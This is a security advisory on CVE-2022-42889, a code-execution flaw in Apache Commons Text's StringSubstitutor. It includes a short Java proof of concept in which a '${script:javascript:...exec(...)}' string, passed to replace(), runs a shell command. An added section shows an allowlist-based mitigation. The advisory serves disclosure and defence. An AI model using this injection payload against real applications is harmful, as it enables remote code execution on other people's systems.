October 17, 2022

GHSL-2022-018: Arbitrary Code Execution in Apache Commons Text - CVE-2022-42889

Alvaro Munoz

Coordinated Disclosure Timeline

Summary

The StringSubstitutor default interpolators may lead to unsafe script evaluation and arbitrary code execution.

Product

Apache Commons Text

Tested Version

1.9

Details

Issue: Unsafe script evaluation (GHSL-2022-018)

The StringSubstitutor, when used with the default interpolators (StringSubstitutor.createInterpolator()), will perform string lookups that may lead to arbitrary code execution.

In particular, if untrusted data flows into the StringSubstitutor.replace() or StringSubstitutor.replaceIn() methods, an attacker will be able to use the ScriptStringLookup to trigger arbitrary code execution.

import org.apache.commons.text.StringSubstitutor;

// Proof of concept: the default interpolator resolves the "script" prefix through ScriptStringLookup,
// so the embedded JavaScript is evaluated during replace().
final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
String out = interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}");
System.out.println(out);
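The mitigation this advisory points to is to never hand a default-interpolator StringSubstitutor untrusted text. The following is an added example (not code from the advisory or from the Apache Commons Text project) of the safer construction: build the substitutor from an explicit allowlist of lookups, so the script lookup is never registered and an attacker-controlled `${script:...}` placeholder cannot be evaluated. The "app" prefix, its map values and the sample input are assumptions made for the demonstration.

```java
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

public class AllowlistedSubstitutor {

    // Register only the lookups the application actually needs. "script" (and the
    // other default lookups such as "dns", "url" or "file") are deliberately absent.
    static StringSubstitutor build(Map<String, String> appValues) {
        Map<String, StringLookup> allowed = new HashMap<>();
        allowed.put("date", StringLookupFactory.INSTANCE.dateStringLookup());
        // Hypothetical application-specific prefix backed by an in-memory map.
        allowed.put("app", StringLookupFactory.INSTANCE.mapStringLookup(appValues));

        // defaultStringLookup = null and addDefaultLookups = false: nothing outside
        // the map above is resolvable, so an unknown prefix resolves to null and the
        // placeholder is left in the output untouched rather than evaluated.
        StringLookup lookup = StringLookupFactory.INSTANCE
                .interpolatorStringLookup(allowed, null, false);
        return new StringSubstitutor(lookup);
    }

    public static void main(String[] args) {
        Map<String, String> appValues = new HashMap<>();
        appValues.put("name", "demo");
        StringSubstitutor safe = build(appValues);

        // Constructed input of the same shape as the advisory's proof of concept,
        // mixed with a legitimate placeholder. Only "${app:name}" is substituted;
        // the "script" prefix is not registered, so it is not evaluated.
        String untrusted = "${script:javascript:1+1} and ${app:name}";
        System.out.println(safe.replace(untrusted));
    }
}
```

Keeping StringSubstitutor.createInterpolator() and filtering input instead is fragile, because the interpolator prefix set is what decides which lookups are reachable; restricting the map is the control that holds regardless of what text reaches replace().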

Impact

This issue may lead to Remote Code Execution (RCE).

CVE

Resources

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2022-018 in any communication regarding this issue.